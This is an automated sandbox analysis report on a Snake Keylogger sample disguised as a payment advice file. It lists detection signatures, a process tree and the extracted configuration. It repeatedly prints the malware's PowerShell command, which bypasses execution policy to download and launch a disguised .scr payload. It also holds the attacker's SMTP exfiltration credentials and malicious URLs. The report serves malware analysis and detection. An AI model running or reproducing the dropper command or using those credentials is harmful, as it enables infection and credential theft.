Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample name:Payment_Advice.exe
Analysis ID:1434636
MD5:e708aa3160e224de971421d5bc2fee29
SHA1:7db6e4d3e5e2db1cd12717fa9a62a35a52834c02
SHA256:ba78d6ffbd1bd564598b33a3d28d437b3fe7129ffb93dee80e732e44098b9aa9
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment_Advice.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: E708AA3160E224DE971421D5BC2FEE29)
    • Payment_Advice.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: E708AA3160E224DE971421D5BC2FEE29)
      • wscript.exe (PID: 2436 cmdline: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 4912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 5760 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 2928 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7348 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • hadvices.scr (PID: 3024 cmdline: "C:\Windows\Temp\hadvices.scr" /S MD5: 012DE24142F859797FBB5A25A7A3290D)
            • hadvices.scr (PID: 8336 cmdline: "C:\Windows\Temp\hadvices.scr" MD5: 012DE24142F859797FBB5A25A7A3290D)
  • svchost.exe (PID: 7176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment_Advice.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\Temp\hadvices.scrJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x3546d:$x1: In$J$ct0r
        00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x14857:$a1: get_encryptedPassword
            • 0x14b4d:$a2: get_encryptedUsername
            • 0x14663:$a3: get_timePasswordChanged
            • 0x1475e:$a4: get_passwordField
            • 0x1486d:$a5: set_encryptedPassword
            • 0x15ebf:$a7: get_logins
            • 0x15e22:$a10: KeyLoggerEventArgs
            • 0x15abb:$a11: KeyLoggerEventArgsEventHandler
            00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
            • 0x181b8:$x1: $%SMTPDV$
            • 0x1821c:$x2: $#TheHashHere%&
            • 0x19899:$x3: %FTPDV$
            • 0x1998d:$x4: $%TelegramDv$
            • 0x15abb:$x5: KeyLoggerEventArgs
            • 0x15e22:$x5: KeyLoggerEventArgs
            • 0x198bd:$m2: Clipboard Logs ID
            • 0x19a89:$m2: Screenshot Logs ID
            • 0x19b55:$m2: keystroke Logs ID
            • 0x19a61:$m4: \SnakeKeylogger\
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            23.2.hadvices.scr.3e03d90.4.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x48e6b:$x1: In$J$ct0r
            0.2.Payment_Advice.exe.5590000.4.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x3546d:$x1: In$J$ct0r
            0.2.Payment_Advice.exe.404e590.3.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x3366d:$x1: In$J$ct0r
            0.2.Payment_Advice.exe.31018e4.0.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x165dc:$x1: In$J$ct0r
            • 0x182d0:$a1: WriteProcessMemory
            • 0x1835c:$a1: WriteProcessMemory
            • 0x18430:$a4: VirtualAllocEx
            • 0x18654:$a4: VirtualAllocEx
            • 0x186d4:$a4: VirtualAllocEx
            • 0x16894:$s3: net.pipe
            • 0x168b4:$s4: vsmacros
            0.2.Payment_Advice.exe.31018e4.0.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x165dc:$x1: In$J$ct0r
            • 0x182d0:$a1: WriteProcessMemory
            • 0x1835c:$a1: WriteProcessMemory
            • 0x18430:$a4: VirtualAllocEx
            • 0x18654:$a4: VirtualAllocEx
            • 0x186d4:$a4: VirtualAllocEx
            • 0x16894:$s3: net.pipe
            • 0x168b4:$s4: vsmacros
            Click to see the 42 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
            Sigma detected: Suspicious Invoke-WebRequest Execution
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
            Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Users\Public\Payment_Advice.pdf
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.167.142.65, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Temp\hadvices.scr, Initiated: true, ProcessId: 8336, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49743
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7176, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:05/01/24-15:18:36.864942
            SID:2044767
            Source Port:49745
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/01/24-15:18:34.721845
            SID:2044767
            Source Port:49744
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/01/24-15:18:41.126293
            SID:2044767
            Source Port:49747
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/01/24-15:18:39.013246
            SID:2044767
            Source Port:49746
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/01/24-15:18:23.398629
            SID:2044767
            Source Port:49743
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://mail.qoldenfrontier.comAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}
            Multi AV Scanner detection for domain / URL
            Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
            Source: advising-receipts.comVirustotal: Detection: 13%Perma Link
            Source: https://advising-receipts.comVirustotal: Detection: 9%Perma Link
            Source: http://advising-receipts.comVirustotal: Detection: 13%Perma Link
            Source: https://scratchdreams.tkVirustotal: Detection: 16%Perma Link
            Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
            Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Windows\Temp\hadvices.scrReversingLabs: Detection: 70%
            Source: C:\Windows\Temp\hadvices.scrVirustotal: Detection: 34%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Payment_Advice.exeReversingLabs: Detection: 28%
            Machine Learning detection for dropped file
